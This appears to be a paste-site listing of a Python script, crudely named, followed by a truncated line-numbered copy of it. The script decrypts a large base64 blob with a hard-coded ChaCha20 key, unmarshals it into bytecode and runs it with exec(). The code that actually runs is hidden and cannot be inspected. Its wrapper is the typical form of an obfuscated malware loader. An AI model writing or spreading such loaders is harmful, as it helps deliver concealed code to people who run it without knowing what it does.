pidor.py
· 12 KiB · Python
Raw
import marshal
import base64
import sys
from Crypto.Cipher import ChaCha20
# CONFIG
_k_hex = "4d73127eb75c39cb54c163843b42ba87f0481c96a7a863353470d19fbab56f27"
_p_b64 = "7SqiM0neE15znI5DjrVbdij22skI6h7qmVoAb5CAQAdeUXvs/kobXuXBQiJ7/7xz0o9EEidoMZOS7WRZzpC9xSA7y56jhkzadZQ1N6tNnvx1nHoUV+nQ5JZein0oVpXc8iJk9njue0LmdR3NSQ+mPT07AcdrPsf3/JbMBhLoJVwxM6/c74fMhP9e36LJVtiEOqawpoSeFFLcW/GgXljgl0eupd4cBs22okBtzOE/+2mZ13ccLYnA7QrEumEnVjjpOiA8JGeUBot5zf39ONkbpFAHKsPDenPsgABC0vnwnxvbs3inqGpakvnbMhNnIIPFqCaOkDqufueGfBjPHDTa6ik8Kc0SNhi8BVptNXeefHdh6fAQ98fYRm2AD4STSVTxUPKkXzs7HjveuO1odb2hpjlQzKMD4f/T2Fi+CE1ZisVR6G4SMDBKlA7OjRus/vZmUqgxfEw1MHh75PrZH95jPAwDV6ttFxkqHSvOguC1xVnhfsKqiSk7Wh5P+L0zvIPlf/uSf6sn5DiNe748nxJ02YXNTjhuk+626544nw1TV2euuCxm8ZZ9n5p2UicwrqOGieGNwV7zVc9ZmIxicQWugcSynRDHFKy58RLvAzp3wOzEOP+ewIoOq5uYYdC1e3sLoxarD9/rHsNJKBjow4xlvMI2JP+nOzTcCpKx/GT+YxtthdmoLaVLv3U9jCJpIk+cSUpZfwKZuPyjVcRW6abFYPI/CdzllPgZSwxH3ltK1XENeuFjli1+uLzRmjkOpQb9AQvQzVcvurdaXsWnA8TRqeM71yydvUWCzcNAavZl4QqYJGEfSWlk/NpHXHXUfc4LcPYLrNOsz6sGewyz6u37FHI9llFRcnBmq2K7U/8wUYEv9H4viQfzT/q5cmmB/Eaerjn1xKOBf0buarKO1O5Re/VGHq+Rfpu+z8AWT0w++5FXYRG/dyhNZK+nze5pN2V+KRq1KZEj7sOFn9pVFN1yEzOUQOGZ9Leg9xlOeOUGz4TOMElaWFfKmxM+3d2JPwRY6btQOMNcWeczltzso/hqz0UzCiiRqZpaEp5m1rCzM49vhhzmbSjx8uHbgM71F7Cs2H6aZZErH9Twa5kaUBIQNNM54B1CBO7nC0nac851JlPA7WaKxLlCl/ISOWi+uscJPueWy5yCLas0Z13pnHbBpJUVQWm85akSd/Cfhh8wVNIzNh7rTg+lntnzZ0ifaseEpIpuSENtdTrTLz+wK/orH7L2U5Ahyr3Ub5i1fNy53/rA8HX1KmiVl3xU7jRTUVnVgMK+EKQgtQgKKCGi4HWV276megYr9tmdNndEpFEiCYtPakbDNPEhVaQ15RAKTKdFApt0q8fMF+vBEVXQnPdb2uGB21J1HIKLkNOp8/cFCkxoWlPhfy8krI3StYZIP0PPKPe4RvuJT+dN5HsL8Pm7MnGuakecKy20jLk4NEkGbKh+SnpA7tX6Z1RMOQNyJrxz1z7kQhP0q19S1DkilG6Z0e2jMTRaLHSG8kH0yRf2BxFfHjOyP4C53LnBXlo9aiKYOWSvPRBDL/i1NTAzH+trBCTndWYfazTgSpM/0EG0Hek9nStFASraURciZZ8D1d5eAF2Lu/0UoEkkSyoRtHuHn6GheNt2p3FPWCH/AEHaaCmbBULk8SlgwjEJ+Ceye2UvJCns7zBs1GLu8uudxsNjbPuEzaEBrkqOerzdM1qLaEc7YCQfxa3sUyq1BSayEWt6LXIPirife+fqs+OItyoQhpvOP7JGil00pwTZQwJfXnKskdMRfAAsGZBZt2osh5U1/hBE2AVQIYw40IAqFU4QCTNAlymG4s717Td8eZI07Io2vp1K+XxMtvzWG/D+68O+nxSfEfNsTl5yUwdGI+SxoDgGC2LIHYkKMjNQkz//vZCeZTGGPHBJhbbcy+D0WBKGrNjC7tjCa47JZDzc7EZ3UgMhQYnLaqOOnVHgdXG2vNZ47sv3zBRYZL5usDW35jtphP7+R6nBaSyWqBve6l/uz9KFRO1GS5U5akIk6IIgYxrWO7Nv8jPGu/LAxV6SAGixf7CLN9GoqLmAX06y/bhddH9JR3616Ka4n/0RAD31Sl1QPmor57ZYDJivTXhwKn//Jzmtqd/iMNYvQ7MgQ/AbWbgiBHTgeQdRYzTmgS/AkWGOWO9YRuVdVnEhqs58TH3WFfBMAPGkInhbWeafiPBMBd4SgW1D2MbVNnNdV5gGJby4dKbuNGO9vX0LpbZLdrYCy5l8rxRizL4aJ/n4WttuVn5zRmieYOU0snvRlD9Cw67VbbmRnPgV29YvluDtTma3qZkijL+X6uYCRir+hJQVq/l93fChYPJeNJeYe0QPInmB4e0FLU45F116WtenSlS9NcU9/hhuLOct0Q8C5aNdTrLcm/dKvqJ69ZXF8195zR0VVtXzcfbh7TGs9iix+l/n+68t2+BKPcX0px1XOf39g06u/jpPsvwMVA+UKwxMVVblkG7QPB2d9D7WyzAqRjPFK7NQE1TWqWDqP+QGFJddswgGuwwdo9BVJ+AaLmDdtg8y1HHnrQ9p3OPRVUa5qQSwOOGME7y2MHltUbtAphG+seuV3FtnZIqT7I7bmIAW1chDF2QYIzUE7YvC0tsf4iI1GbTmqxynC5K/H3SCG/iouS8G4Q0fkKD45tso8N97NcSgHASFEt5/9xsMaDsoyXA41EzGryCLxFAF2LgseboXSYI1mfX0WmGQaBcqOSjHorX5z60o23q9aasnrlbwwWziNF5FXGH94gfyWWqppd4yRflYFCz+lap4VnvLV4sTr/81HqEMbXwTdjo2HzEgpWABkdVYLYm+jzgqAfeJPx4UitbWDgaavOOtPfPHuP078FZLP1tEvv+eAbSP8a2qobViHzb0u9+TyPgotyjQbWFgTDVt5uuhDJxqB0dRIi85ytZx6dEVTz5b+kAufXXThdSCfnSQ7ZlEb5qTVF6lBVhCCGGZdhPj2XXpfwg9KMJqPlRkExKVcJ/Lbj6Rukkt4/uk9htNVVTicGNCs98gb253kLVscG3R1ujGg/KsGK+Vlt+95pJQ7vCdyNQIKL+deKzog2NK0rs1//tI90qABP9DQUxVI4qYDZ1xtfyzHYUs8ovCW2QEtO3+dN+viCmNO0KmgAshVZlslwUn3fRrnp5Y1i6PYgaQCZ5QDimQLDlOxxXTyzg9nc4iMEtECIpWLgu/Jcz0l0y9BgQcIxXk/xfVjHApG0jlxBtZym6RTQ0O9Qxvu6dJjZ2Z3nk8CLCah40Lxx8nSEIV/69sfqWyBmPkvIcXdw3YXyxyCkj+mtP1LYIqezN/6+6J+D++z4W5lZJKw1vLz3ZADAC1TPCHZr9TT2hknR02GBHZ8aN0XwwVpSbLvZaEA39nB/MfELniB399nOkZCXnht6aBrcKxFlhCYgCRhCesmEK5PFUIn8N1GIv4IpIMwSSdXSfGIH17tKF7wBqu7m6e24cfm1GgsC0gb2Xd0VJtxNjhR5lxGmgTJSIMdhpzdE7WZNQgvCyzO/fGjCB/AaNl5ysS4TC+SHRrrBpBMOATrYE1cOphJ823u+RFLyIgQSequ6IE/E+uMdEEER6NENBlegckUawjvwQ8Y7ChtqcieE2B2FqLjhppEnrSltrrRNjXIg/eKstotZ8rOMXImeXRRoonNms4BBwRY7Rapbs7+jsEAphD11cC2yngSZcXrIeZ0FmR9Zl/LrrjcU70d1zCE2QiHV7Mv9LddIhVPHNlZuH7FcQlNp5Sq+wLbu6cxKDEQ2/Hhv+zLTslwu/v9fKqX5mRgAHUAR7k8lQ4mz7jePJx+l01+pbdvUCE2oSVDf8+Tn+NvONyJ0DwtRJfUc4yzWa2oldN1AbxDEkDwWkwN5RDHK50Jm8+sf4O4+CKqDrL7+cR/eBrXXe5jYGXxBoDp+u0rls9VO1P3YktJIOHef1zsAmikZB9gGdfyGL7zdl+zNtB09gQfvRJ5Z7JNA05E2p6P1JDw7uXBbBRvdsjnNxIAZK93fqg09ENZElRfsiRTP6ERPFxCoFlOMa504A5A7GCM+6ovBf/7k8xAlUcqsOlQwxk959uXjds7c1vbO7L0xXn78VPYJ7jxR1Zrtu1bDLCexYB5FfsIqYDUVgTX813k89VUFk1aKoeoCTwPf6OrakVHfGRn5vosay0Xc9U97d3hE37Ryd9nFk3SiGXPZswQ5bPwJbMF0NcHFZm6KP/zfo5VVXWUpp6WNfsSKvD7jlWixWEMR0hqCasnQBfBAf5wBF34PQaxQe/m5d8RNVgcXtBEqyzVI3329m2UTwKb3uufuxKcfLrwVhqpqZFQ3Hc826BKM3IvoJ8ey1EChFrVzEhGJi4ksYNHGtDRRq24FoY9EFVfxdYC/i6aFuQ+mOSzljfINKtl8p/RAXsYMedNy5LeMZqTso71qtwn7I5HauQo8cBnri1isOyxAVqRKpNK02g9UXyMKZVFOLcGRQXrdw8AuyzTq6QAe4ffDlXb0Ie3eG1hd1PReOCJJB06q2mVcswuce2W1YdpI/vM8HU4OEhtHNa1qMPNlaEAGebnZ3tDohWsucxFWa6gpKs4Wd3cyhdqI4UNn+uZwr3gZw43O98VSx1jdWLIw3RZEqHEDEnzIElz0B2YYuKJwhHKbkExINxd1ACicS7SMwz+Y4UoGa3PTRPeHhBm++e7fBW0XratrWHgteHCmHRLVkrwWJFU1NDX4MsQutZW/XC7gvyX0T/blRNEqGQPAcbtBN8fx7Aa7SnwGuNHrSZhiX41MzEVYOyY0McDAPkHE9ag2a53jK9p0yKxmvmXB7A6ABXmIa/rLz0TwcRya3tE4AB78y9VFrN25js1kxIEiPNVZ2FxrNojbAcZyWeiowUJJzlVt+Bu+Z08UN8gG71+XGDzs+16LhpKBh5Z0s67LMlfgBvbH22TE+QKKFc0bY3ALzFKMGgwVXWgj0VIbPpH9p0GdgZhcoJvJ01r0VAxLEJV0MIahDQxhJotPlXmDAhDRds2tNHofl14rVNP3idZ5gqhdlNYpUe3m5f/6nWJ6Iz0RGl0KXBEn/Nsz/I68+qszIIy1RDsbuRcU/XYP3qKwkN9r1BZYI3kLVcY5W03S9wbHtk6fu5+4Uz2a18BN1nGu7E9Gc9zjLEjnleizhPIzhrh58e+j8d7hefRFkcgZrNYRvLN61yVAe7Y0p4piGHdmHulzzhuobJEZqMJqGJMfWlc747U4+9A4Lc3Hd0rUoOxwzCshy7W2s4+7o9v3BVj993zQS6/xIucVKNBLNy2G5U3wM7sdGJ0OQHHljYQeoOUzcgZsDYdwUIUzTrkyHiFScFsDTlKMZOHtn7+HCljAM2MIY4mAadI1mHiIzlZp5i6KPuUMuuPMyBlhFb6E6X5P4a77avmf9WMRqhqKyDVVfXxHXWsFU38nskmKOF5atNyUtYUFs/EGi57l6AnDM8RbhzbsFXWZNjpdJnsz5fuo0/QQAcE9yLQaWa7BbIoiLeyHu4qDLvYcRK1AfrqdhmMtVTOo95S+Vub9i1Trsfqr3C+s+Rj7GqtTxQ79fxSg6v4jfut4bqYeIr7oaAoW12D9LAac4tT8hn8OROUP0+RzNeuBi86H0FYrE195RKY5LPzzA6Y+dZdo0+k5l3zJdTiuL3K2JU1TRpMBIHOBEYwvRov1Yz/LiS/fFSgYuMJ2n9ebar5qe05czpp7Q5T+SKJJaQySCB1J0JM/cqRUW4jpY/4YAIvA0zBLOY1uGcSO6CmtPxNRMsOcGieB9zL/I1rAwV0zFgdRKRoGe40NevOBawNNe+ajOF7Qq9kmQWmWZgSJJdGc/i89ZBVFyT5b5keNFHTyJLwjKrOA+bRUOZr6CjM/KAISEd0rkuc4SzJikFGUo7f4kqMmP+hdyLOIA4GIl8ZxMGN/Cn8c6zaJ09E/8LhmabpN0YqRXSmPtdP0NKjbIDdHeG11Q9jEllk5w1Ji8G0PmQpcEJn5PtFrXnZF5aom98mgdD/iOEFFOFq2tTuf8zrD/vEaiU7znTp3iMnNjDzGt4CumIRT9KkVJ7EKLV4u/HqrYFSf1VnhRex5vzSFceN6KUFFjdSOaAska/DOkqHizsEAXPfsDEC9rQw8mFIpnnZPoaCCSKiMc02tXGceal/ojbM9FqZuHgta8/NZ1pwSSrfpsPe9wRpYD30jsTe8ULHJ1VUwELg504FN5Sqq3Yq4HGJzFa2LDReukJGTFc7taWcUC3E3Ay1y46NoT27xvdx91yG7T9l+v1Dc3artykCMN2453sVhv3QGoLQRt7FdV1Sz3Cvsx0jbA+VyD5uG4uwM/oJu09KMJMaAEtE95/z2mWNc9OUHAE0lanOB50yGbLAMU4GuUuGJ3KKDdk9uvKi9BCJWX0eYbadmblqq29jOD8vnIlUroz0a0Ad2XDoL1kZ4igDac+ojsqEYokKT1+qpRmJgi09JmVC9FvtMXoU7h9GeEIlsFZVKc9Gh/ths6vjDh/N0OJ3Whd8i9G8uZbymkmDioEXN5AFmXLQLMUrTIX5oeNKwiW0Te6owDEblKmMsxS3U4rU7ERvdupFpo6NphITvDobb7bLdX17mS9hN8mJBhJJaXqdhUxPvh8+jDSmWMnfq9xFdr8Z/rDP01diQ5uPz7QomLj/NBe2aMapb98QkJxwnPFw3ubvW6Z5JHY0/cLC2Q3KGZxcBAV5jN8v8SNUTxXCHKGF4Pj/W20MUEwWhf1q6PzhaP+oS9/WTsn81HFQaX4JKXo7zUJY0C/PGAC2WHr5LVWYLBgevVnuKq1hySbdgteMBdYlgVSjRCHfVNpTCk97R1dhmHDyvlM+liU8BuUlg+0UzRMQtp4RgO/cplqMfC26Xqbd/cWeuc9mPJhZQRwyiNnTFA8J9LSTa6kDmsMw4qe6YRQZXqmOhlKFQSPN1E4vbhSAEZBJ051zu6jL/hYuO0qZpwHDRtzu5tt1HAl6fpZKMbJ46cx+Nc5VieZByq0VvkaUYxjBVZw94xaNBlYIik3n9kjRT68LLXnoAUtevbgJU/XadOl4uhAKMpjYjgLN34+vk4or6+Xf5w0E7j0krP/VLG1d4K4AwJDgkI3dou9jrMMZ7/FGILlvyZTX7EO3Xw+TZbf4CX2Zq9DzdexX+hdYgx9GSzYF0QO7rYaWp0XbgMQyN6sA7+Gjhexhgc9J1652YVQ8B8g4jMjTy/ATzmCfOotdxOBxt3uKAS24TXTJ9EmI/3UHqFdtukY9v9aUkXwxA4A6xrMSTp8jJSYRVruVFVJ9LfHz+8ABBPZw47EtsBtYAqwjndN00JMQq3S/zIUUf7QYPG2Wqp616LaDQeuNPidS3KYz6Oa+2Qm+itkTml1U4XlFyKb/xlnJ/NKvIgMyIRe7HlvN4A3+QtDQDE66xRe64Yq0Y0k3I8JQZD7NXhpNhwY2sePLEWHQQ0wa4wrQODnAYUrrPHNIiWpFqyO68O6AiSriK68/zcVAIM+qDpyN0FLp1IxmR5EdlC/Y4VOpeyhYVyNafQ+ebt6tTQ7wWyPWORfeM0M5Jy4CY69f824cd4DSfiUi92RpTMVlRXasucZc4MyNajL1wMrT33PWyH6S/lnEGXoQusP9mkZL9Ak/XBFSj06HrQbKK5uszlJ9HTFn9KCMBjmhq6DW26zP5x4eC1kJX5Hl6ZUPCstvn76X0x7mEMEbKhlw6LZS1q633g9KHm1f/ZO7pyS/iglqOY5kA6/FabpIbLCfDG0LA+QVBNceZTFDkQHo6PHcVZeHI82qOFTFImAIixvnvWFbJIWmEDhASKFOZ51cVUsXUV2lLe7/p3+vwUsApH1Hk/c725/fq0vqwmpiC/bREkwLelK+9rGJyE6stkqNF0Y08xwC64O38sZFfYq+ojhXcpgFkvBiAdEdgUwPjSThqc7Kb/SGQUM2MZJ7s+wDN3ttGo+MMssy1cGyghwhrnUtx3zYlElUW9wJZHOnb7qCfgm3GGWTUwjldaWUhz9cbVrhmBPFzzN0PHJi4hRjjA7zE8hLjeErD7yMNshfspM9w0stxuM4SorstKNm1kBSrajWe46Ts6HEUhlei0gyWrA/cFH7SQfYsF4HbZqpY++1HmOFR09YXK/T+ccfwoVNqxy7IEV5tJBz2NCovOYfnJa7NJ+lSq1LPCqfw23X97b63RTpOp0ZNHkgdJrpxAEuEIN61w47ugm8ORNUleNrjFRVpESPhsaxut1pUDRFtuuN9DqfpiTHeJDBrBRL7TNJnBg0wGa5+qa170QBxuUQktCMoWxUHv6+fMfiXI0qCLARYfGctl8wOn1JERCsf/fRDebAUAbhdjqHadjW+lZuVBk52rfsrifahAC8QUzNvKbQj60K3kdB/wlDuEZKy7ba84H3KfBPmdn5yNzMnQ27KzkHqrXnKSagN+pLxD69LFS5a6Dn2we69NoFimkfAAuPHB9+mvIKNKBxjFy4mNnW720cbbccY82VakAhWn2WOeCjrB23u1bnv/1H1JwC1fPPy1HtGLrVHr143gO4E7cwd+Rs71nI+cSRc0ozHdHdQCmxUePhysaSuX6BM1FQnoY7cWExiKkwZa6ioJA8Y2OdEYGOCDJ7rPvBBU4uEwq/M3E8FtXogOABen+EAEFkIU8YY7p/YkDYrLmszxXGYYoRXS8UyZ4WxTwN3pMIIdSMl3Y3cK7fCcPPpNaszyCkzBUCCMvDU/pEnZiFldOEzS/6C2C2dsLyqsocHeBnc3XCUPJyhF2Hpol2WdGy4KOp+6hE/PbLeFnAo58W/WsmJm4xqXnpASqj4Kcg5TOxZ9Ck1PNtb1KjOSmxaPpcgj1immSYvxU/pPL64c4LxUt0Y/FH/mE+6zQQPCejgHxyM8QiTTs+6YdTeUEO6GEFfcD2HbO6n3uWIQTkYb96G6V/qSVMOTW5btb+HpanrK12Y2jPbTVN+PDU/WdGdvHbbGj8sTuwr2Ow7YH6B026llBfGTy7YJnOKS7B6HVPS1tHVuDivwQ2sTjco1UbbV87ltAZqqhmyzI5WNwDazxGmi2K3cxHSh7bjqjLV8KphhdE6vcD7dquS2TJKP4weIH/8c6M89VkfPtRsCbMTuW7BUUOuCRsAylVAh3ThYk/qLe2itEY3689npC8g2ic4KWDmAsRPakkg2/PgdoEUgt11177m2Yz01HIZVJOEQ4TGKS5EPGQRoXVpjroWwfVN7NFKNqxWThtNMb4HCJ6rJXdgkWDooTfFskZumLmPxKCz57XT9VO5c13RgxTzbHbs3bxRhEGoCGdnU9PuJQL8bejNwTgMRLqZQBFz45Bz06outRrVnluS8PdywxV+gT3kgmL1CgjnawIjFuOG+J9Fp+2+cqaqFMeg6MHaNpHBEetWlx86dJK/hMbOkoT626StYAZPpnJ5he29DIHkXZYFdOx5D6a+PEBn0QjZrnkq8dyuCcPSsn7W8976LqOKz2e6cBiKS8DXN8P1q2HlsYZlOBtf8dJNQWnDVHLvC1RsWf/xi+UcnlkdUqNpI/bfXDIZMq5LNGYh31uUIEfNAkKaQBsSUkE22SzQi5p7Id2QolhwHjz2oVczzmtGqz0YpOcWHZ21qad+RiNMQQSbfHPjpsLRSJ7EY/DpLnoq7WllE376bH97u9AUm/puGAQJpuX+kBJdlJ03hi86dqnfBfM9fyz6IjbNpL/W3cju5Bn62OzUiM4oTqi1hnmlzxiQSXBeuynM7fxblYafvlxAsmmvtXpWITwnjVuQO5CVHLeQp8oivoTbypuDfxYu9C/4C9lO1poVfKEDw+M4Hx8Qjf2mj6UzjmWh1QGd2T7FQy9/jVM0Lg2eG7EzuNfetzc48KpNhC/Tu/inXA2Nafbn9blNWdRwH4Yc9bhcCFTV2YvGqyeX9rUfFHbu5MyMBs4I9F1TY/pGX6QWQznuS4zXGr4Abw6DPNqMh8w8riEpVVEmBdffX/elEAtDw8mp4vIyXXnMPoUNJS0NOJUraS1X4vASygAqJspAD7wcE6jeDXKS4Ncxc9SCqwmKB/eLpQ2PFOIUBFGRFwJrMa1WXw1LDyttu+GJWSXxeONsLvDy+YwWe0bmWh/B9G+k/z/Ibxy3HWLJZoZaTY9LJXh8tD92PBDI1Qc3QKGJHORM40eiLuxBGymwl1itylzcItVbKGrSNdvcRF7MnpKLrgMNsCyoHgiSzSCev5N4Tu6UhPVi+K6qtEFShEp2ui0o6YYG5R0h3W/mWCbVwD9Juyzdqyv+156V5Em19OdulX8gmDxI8obpwybRfEJ5yKGC2CBhsSxMPMRMyYUcVUbOB/qVHV67UykYPYhvsbTafm2c12jFkI7RQJ6yeOuHiF4M7ipc0ImquTzPxJWeVcBsBsI2WG5QpY/v2auVwwp0Fev5ck9brFdLYy5asVlITbwR/FmANTc9pBHg9o2bHehWjLZOCHyJFIRG2dO/6q8JDKS8E4pdw9cJcTC0XqgDqXce7T68pOcc3nN81Ywmt0mt3p6rVxNJUrMe0y+XZ/c3lcFWt/3sg09+PbRRBnTO1o6++9IhmMwhDuyXw43Dv7pd4sUbo42b9cFXRzvKhOZS+ltycCtuXO+3nkJr2cjOYZzWi17w+Bd224jSi0uPfqBDx0XhK0kK6Cdd5Rn0h9LSMawoHdm9R41byni+jLZ5ZPIw4KNT1GiyrkZzGnFbBzwLCt+14n+TljNlo4vx2CUcW8BjqhIvV5l42suA1lfmFjRtdPj3hqkfsY2w9iU/TRB4K1Y7l/uhKmgCZLZhn7/XM1DgxjhMT/e08HplDEA3z2Bv5Q4LzNd9VwJHbgqZmxp/a37Vm1FrcZJktChvoSEoQTBOqpjxatndsJzQlRjwIiXj2kGUji9ntENv4iB0XHv6eR9EIr15ppA7B+jSXg94vnzQJ9f5iHwCKQyZoaYjssakqcwRCGeaj2jN+ltWECH3caJTwGIcssgiSQU/tA7pUE1vC7sYNf8PCR3dJPPbkrBuqdPivo13OQhkXuYfJKpGcErdJPVYxClMV2TDgDHSC/FrNNPqlSw7yXuHh/aq97q79+gL8UYfrcX43w9TDOzhxR+MoxTTqx232e9LSxXPkxODP54IlmKPuJyeCIqkLR6guM4lhZLKR2UOhvvGcrtnf3/TjBK775HHFeSUVvGrjfYmkRr4+RZcf+dd2JZ8x/S+ChjUXfji0OxVfD+/tX+ltHpRjby0HUFP2qwxu5nA+11bseHOXh7fdsrB60TUzKZXurrW1gVf+4i/Hip8+wjWBUner5xMzIHgWcl2wfbTEvLJimTTfhcCoFHY/K5TGq9jfSiadWkF6R+AQEjtmv1SSsSqdrKjUBAbIWBMo5QLxBCUY+Dw4J+tIhmaZK/anwf2IRhvjEXn3o2Hn1JXZ7Z3ETe43eZCK/oBMIjMEszOU/w9KIFG9AVYZDTuBRlFvgbO4qqz6cjdlR4+17aKbjECEUY+VhAewPJYnsEGIinF0TLQQfqp39F9LkVPKn84Y9XPvtdxqrjY3Twmw3dbvrTA6RP2CiiGXH0DrzvwjNKcXE5UNe2jsNR/Q7+gCJTT8iQx97aS+dNGD1N13C8kyYBV7p8ehAiaoNuI9HkgaaFL9ogZNXZgX2FA4dVg8SNkva"
def _run():
try:
_k = bytes.fromhex(_k_hex)
_raw = base64.b64decode(_p_b64)
_n = _raw[:12]
_ct = _raw[12:]
_cipher = ChaCha20.new(key=_k, nonce=_n)
_dec = _cipher.decrypt(_ct)
code = marshal.loads(_dec)
exec(code, globals())
except ValueError as ve:
print("Error: Integrity check failed or bad key.")
except EOFError:
print("Error: Marshal data corrupted (possibly wrong Python version).")
except Exception as e:
print(f"Error execution: {e}")
if __name__ == "__main__":
_run()
| 1 | import marshal |
| 2 | import base64 |
| 3 | import sys |
| 4 | from Crypto.Cipher import ChaCha20 |
| 5 | |
| 6 | # CONFIG |
| 7 | _k_hex = "4d73127eb75c39cb54c163843b42ba87f0481c96a7a863353470d19fbab56f27" |
| 8 | _p_b64 = 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